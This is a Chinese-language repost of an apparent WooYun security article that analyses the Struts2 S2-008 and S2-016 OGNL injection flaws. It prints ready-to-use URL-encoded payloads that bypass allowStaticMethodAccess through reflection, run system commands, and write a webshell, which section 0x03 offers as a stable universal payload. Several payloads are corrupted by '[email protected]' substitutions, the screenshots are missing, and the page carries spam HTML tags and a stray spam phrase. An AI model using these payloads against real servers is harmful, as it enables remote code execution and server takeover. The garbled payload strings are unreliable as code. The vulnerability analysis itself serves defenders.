<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/papers/902

            weibo:genxor

            0x00 背景


            看到網上關于struts2利用的文章非常多,但是對于漏洞觸發跟蹤分析的文檔比較少,閑來無事跟蹤了一下struts最近吵得比較火的兩個漏洞,研究了一下能夠穩定利用的payload。

            0x01 S2-008


            Struts2框架存在一個devmode模式,方便開發人員調試程序,但是默認devmode是不開啟的,如果想要使用,需要手動修改參數,可以將struts.properties中的devmode設置為true,或是在struts.xml中添加如下代碼,

            <constant name="struts.devMode" value="true" /> 
            

            實際上devmode依賴于struts2底層的struts2-core.jar中的DebuggingInterceptor.java實現,然后漏洞也存在于此程序中。這里我以debug=command這個邏輯下,測試漏洞,我的POC如下所示:

            http://localhost:8080/S2-016/hello.action?debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%[email protected][email protected]%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29 
            

            首先,這里是devmode的幾種模式,

            enter image description here

            繼續跟蹤DebuggingInterceptor.java的代碼,發現問題出在下面這個邏輯當中

            enter image description here

            跟蹤參數如圖

            enter image description here

            可以看到這里

            String cmd = getParameter(EXPRESSION_PARAM); 
            … 
            writer.print(stack.findValue(cmd)); 
            

            這里cmd沒做任何處理,后面直接findValue(findValue能夠執行OGNL表達式,具體參考官方文檔),導致OGNL表達式執行。

            關于這個漏洞執行,其實沒什么好說的,關鍵是這個payload調用java反射類(可以訪問一些私有成員變量)繞過了struts2限制執行java靜態方法的規則法的規則,使之前apache官方的修復又白費了。因為struts2在2.3.14.1版本之后便設置#_memberAccess[“allowStaticMethodAccess”]為不可修改,而要調用java靜態方法,必須要設置allowStaticMethodAccess為true才可以。這里使用

            #f = #_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')
            #f.setAccessible(true) 
            #f.set(#_memberAccess, true) 
            

            這里使用java的反射機制繞過了限制。另外,還有利用java.lang.ProcessBuilder類的start()方法來實現(ProcessBuilder類是用來創建系統進程的,每個實例管理一個進程屬性集合,start方法用來創建一個新的進程實例,并且可以從相同的實例中反復多次的初始化、創建子進程。隨便構造一個java.lang.ProcessBuilder的實例,然后調用它的start()方法,便達到命令執行的目的),但這個算是另一種思路,并沒有從根本上修改#_memberAccess[“allowStaticMethodAccess”]的值。

            0x02 S2-016


            在struts2中,DefaultActionMapper類支持以"action:"、"redirect:"、"redirectAction:"作為導航或是重定向前綴,但是這些前綴后面同時可以跟OGNL表達式,由于struts2沒有對這些前綴做過濾,導致利用OGNL表達式調用java靜態方法執行任意系統命令。

            這里以“redirect:”前綴舉例,struts2會將“redirect:”前綴后面的內容設置到redirect.location當中,這里我們一步步跟蹤,首先是這個getMapping函數跟入

            enter image description here

            這里一直到這個handleSpecialParameters(),繼續跟入

            enter image description here

            enter image description here

            這里真正傳入OGNL表達式是在這個parameterAction.execute()中,繼續跟入來到DefaultActionMapper.java的代碼

            enter image description here

            這里key.substring(REDIRECT_PREFIX.length())便是前綴后面的內容也就是OGNL表達式,struts2會調用setLocation方法將他設置到redirect.location中。然后這里調用mapping.setResult(redirect)將redirect對象設置到mapping對象中的result里,如圖所示

            enter image description here

            然而上面的過程只是傳遞OGNL表達式,真正執行是在后面,這里是在FilterDispatcher類中的dispatcher.serviceAction()方法,這里的mapping對象中設置了傳入的OGNL

            enter image description here

            這里跟入方法最終會在TextParseUtil這個類的調用stack.findValue()方法執行OGNL。

            enter image description here

            0x03 PAYLOAD


            這里我結合之前幾個漏洞湊出一個通用payload,目前測試還是很穩定的

            命令執行

            %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%[email protected][email protected]%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29
            

            Getshell

            %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%29%2c%23b%3dnew+java.io.FileOutputStream%28new%20java.lang.StringBuil[email protected]@[email protected][email protected][email protected][email protected][email protected]%28%29%2c%23genxor.close%28%29
            

            同時在之前的struts2exp這個程序基礎上修改出一個exp,整合了近幾年出現的幾個高危漏洞,

            enter image description here

            程序先不公開放出,大家可以自己用語句測試自己的服務器是否有該問題。

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线